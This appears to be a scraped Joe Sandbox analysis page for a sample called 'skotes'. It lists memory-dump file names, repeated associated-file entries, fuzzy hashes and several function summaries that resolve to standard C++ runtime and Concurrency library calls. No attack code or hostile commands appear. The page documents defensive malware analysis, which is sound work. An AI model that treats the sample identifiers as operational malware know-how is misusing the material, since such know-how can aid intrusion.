Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: 46cd5fd4db432d8e4677f6c6227c65aac9bffbd85985408ebfcc9c0b5202f4a7
Instruction ID: c344a0304a6b26d98f8ce03ed75356e89a97645521bb9f9b376f205f089243ed
Opcode Fuzzy Hash: 46cd5fd4db432d8e4677f6c6227c65aac9bffbd85985408ebfcc9c0b5202f4a7
Instruction Fuzzy Hash: 95110875681204E7DB24FBA4CD4BFEE73A86F00705F604625B905A70D1EBB8AE08C771

Function 0075A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0075A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0075A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0075A139

Strings

pScheduler, xrefs: 0075A131

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 215e46e3aed74112137277cb8726bc4e19e2eb73506e0643dfe1bd7be7016de4
Instruction ID: 7c425f5f7b107958955d98ea7995ec936770010c29550bf78802f998ec38ebc1
Opcode Fuzzy Hash: 215e46e3aed74112137277cb8726bc4e19e2eb73506e0643dfe1bd7be7016de4
Instruction Fuzzy Hash: 3CF0B475940A0CF78725FA54DC86CDEB3789F90716B208639EC0657181DBBCAA0AC7D2

Function 007767A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00776902
__alloca_probe_16.LIBCMT ref: 00776998
__freea.LIBCMT ref: 00776A03
__freea.LIBCMT ref: 00776A0F

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID:
API String ID: 1635606685-0
Opcode ID: 8d30167cdb0abf40f7f35886b4a5007457b9d66d40ca56457468f1e07d0c1b15
Instruction ID: 9567a4265330f733f9f33dd09af3d3223f2bdfd4dfb0f766ce9968e07f7e1df9
Opcode Fuzzy Hash: 8d30167cdb0abf40f7f35886b4a5007457b9d66d40ca56457468f1e07d0c1b15
Instruction Fuzzy Hash: 5E81E272D00A069FDF209E648881EEF7BB59F49790F19C169E908B7245E73DDC40CBA1

Function 0076504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00765115
___AdjustPointer.LIBCMT ref: 00765138
___AdjustPointer.LIBCMT ref: 007651D4

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 20745fd3bf4e6384775809762732cf35a5f04b5b92fc39208314150917bce677
Instruction ID: 285801f97f40e76232437f2ad6802f0f8b6b4ab2ae1f677e5605041aa64225ff
Opcode Fuzzy Hash: 20745fd3bf4e6384775809762732cf35a5f04b5b92fc39208314150917bce677
Instruction Fuzzy Hash: D551D171601A0AEFDB298F54D885B7A73B5FF12310F248529EC0797291E739ED40EB91

Function 00764C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00764C66
TypeidsEqual.LIBVCRUNTIME ref: 00764C8B
PMDtoOffset.LIBCMT ref: 00764CA1
PMDtoOffset.LIBCMT ref: 00764D22

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: 5445afe941307b39fdb187f1c89e81d857d7fd631a1b50545057e998aadf639e
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: 3F519935E046099FCF11CF68C4806EEBBF4EF16354F14449AED52A7351D33AAA05CBA0

Function 0075DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0075DB64

Part of subcall function 00758F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00758F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0075DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0075DBE9
Concurrency::location::_Assign.LIBCMT ref: 0075DC56

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
